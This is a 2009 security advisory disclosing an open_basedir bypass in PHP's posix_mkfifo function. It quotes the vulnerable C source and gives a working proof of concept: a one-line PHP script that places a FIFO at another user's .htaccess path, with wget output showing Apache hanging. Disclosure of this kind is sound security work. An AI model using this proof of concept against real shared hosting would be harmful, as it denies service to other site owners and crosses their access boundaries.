[ PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ]

Author: Grzegorz Stachowiak

Date:
- - Dis.: 25.09.2009
- - Pub.: 29.09.2009

Risk: Low

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.11 and prior

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.posix-mkfifo.php

- --- 1. PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ---

posix_mkfifo — Create a fifo special file (a named pipe)

posix_mkfifo() creates a special FIFO file which exists in the file system and acts as a bidirectional communication endpoint for processes.

Function not check open_basedir value, so we can create any file in any writable folder, if open_basedir is enabled. We can "freeze" Apache and prevent access to any writable folder.

- ---ext/posix/posix.c---

PHP_FUNCTION(posix_mkfifo)
{
	char *path;
	int path_len;
	long mode;
	int     result;
	
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl", &path, &path_len, &mode) == FAILURE) {
		RETURN_FALSE;
	}

	if (PG(safe_mode) && (!php_checkuid(path, NULL, CHECKUID_ALLOW_ONLY_DIR))) {                        [1]
		RETURN_FALSE;
	}

	result = mkfifo(path, mode);
	if (result < 0) {
		POSIX_G(last_error) = errno;
		RETURN_FALSE;
	}

	RETURN_TRUE;
}

- ---ext/standard/file.c---

[1]. Function posix_mkfifo check only safe_mode value.


- ---example0 (5.2.11/5.3.0)---

x@x-desktop:/var/www/$ php -v

PHP 5.3.0 (cli) (built: Sep 22 2009 14:06:39)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies

|----------------------------------------------------------------|

x@x-desktop:/var/www$ php -r "echo ini_get('open_basedir').PHP_EOL;

/var/www:/tmp

x@x-desktop:/var/www$


|----------------------------------------------------------------|

x@x-desktop:/var/www$ cat fifo.php

<?
posix_mkfifo('/home/y/www/.htaccess',0777);
?>
|----------------------------------------------------------------|

x@x-desktop:/var/www$ wget http://localhost/config.txt
--17:39:31-- http://localhost:80/config.txt
=> `config.txt'
Connecting to localhost:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 25 [text/plain]

0K -> [100%]

(24.41 KB/s) - `config.txt' saved [25/25] 

|----------------------------------------------------------------|

x@x-desktop:/var/www$ php fifo.php

x@x-desktop:/var/www$

|----------------------------------------------------------------|

x@x-desktop:/var/www$ wget http://localhost/config.txt
--17:39:43-- http://localhost:80/config.txt
=> `config.txt'
Connecting to localhost:80... connected!
HTTP request sent, awaiting response...

|----------------------------------------------------------------|

Apache try receive access to .htaccess file, but fifo special file not allow a "normal" read, so we can't read files in this directory and all subdirectories. 

- --- 3. Contact ---

Author: Grzegorz Stachowiak
Email: stachowiak {a|t} analogicode.pl